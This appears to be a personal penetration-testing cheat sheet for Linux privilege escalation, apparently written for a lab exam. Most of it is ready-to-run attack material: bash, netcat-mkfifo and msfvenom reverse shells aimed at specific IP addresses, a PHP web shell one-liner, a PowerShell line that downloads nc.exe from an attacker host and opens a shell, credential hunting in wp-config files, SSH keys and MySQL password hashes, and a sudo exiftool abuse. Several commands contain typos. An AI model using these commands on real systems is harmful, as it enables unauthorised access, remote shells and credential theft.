* Check these for privesc! :

-> check hidden file in . directory
+ .bash_history
+ .config
+ /var/log
$ cat /etc/os-release
$ cat /etc/passwd | cut =f1 -d:
$ cat /etc/group
$ cat /etc/hosts
$ lastlog
$ history
$ ls -la /etc/cron.daily/
$ ls -l /bin /usr/bin/ /usr/sbin/
$ ps aux | grep root
$ ls /home
$ env
$ lscpu
$ sudo -l
$ uname -a
$ cat /etc/lsb-release
$ dpkg -l
$ linpeas
$ find / -group filter 2>dev/null
$ echo $PATH
$ pwd && conncheck
$ screen -v

* Credential Hunting
$ cat wp-config.php | grep 'DB_USER\|DB_PASSWORD'
$ ls `/.ssh

* Compile c file
$ gcc shell.c -o shell

* Sample bash reverse shell:
$ bash -i >& /dev/tcp/192.168.45.204/443 0>&1
$ <?php system($_GET["cmd"]); ?>'
$ 0=/bin/bash+-c+%27bash+-i+%3E%26+/dev/tcp/192.168.45.162/80+0%3E%261%27

* if you founf more domain or ip addresses, add to dns -> /etc/hosts

* if you got the www-data, please check these:
$ find / -name "*.conf" 2>/dev/null
$ find / -name "*.log" 2>/dev/null
$ find / -name "id_rsa" 2>/dev/null
$ find / -name "*.history" 2>/dev/null 
$ cat /etc/passwd
$ ls -la /home
$ ps aux
$ netstat -tuln

* Don't forget to:
$ hostname && whoami && cat /root/proof.txt && ip addr:

* maybe you found bug of sql
query: select user, authentication_string from user;

[gtfobins](https://gtfobins.github.io/) -> for binary exploit
sample: 
create malicious binary(app) (#!/bin/bash enter bash) then:
chmod +x binary
sudo /usr/local/bin/exiftool -filename=/usr/bin/app (binary path)
sudo /usr/bin/app

* generate shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=urip LPORT=4444 -f elf -o shell.elf

* path traversal vuln:
../../../../../../../../...................

* command injection vuln:
powershell -c iwr http://ipkali/nc.exe -OutFile \windows\temp\nc.exe;windows\temp\nc.exe -nv ipkali 443 -e cmd

* generate reverse shell
https://github.com/pentestmonkey/php-reverse-shell

* example privesc:
/usr/bin/dstat create file py
		/usr/local/share/dstat/
		doas -u root /usr/bin/dstat --name
/opt/update_dependencies.rb
		yaml deserialization
	/home/nibbler/personal/stuff/monitor.sh
		echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip 8083 > /tmp/f" >> monitor.sh
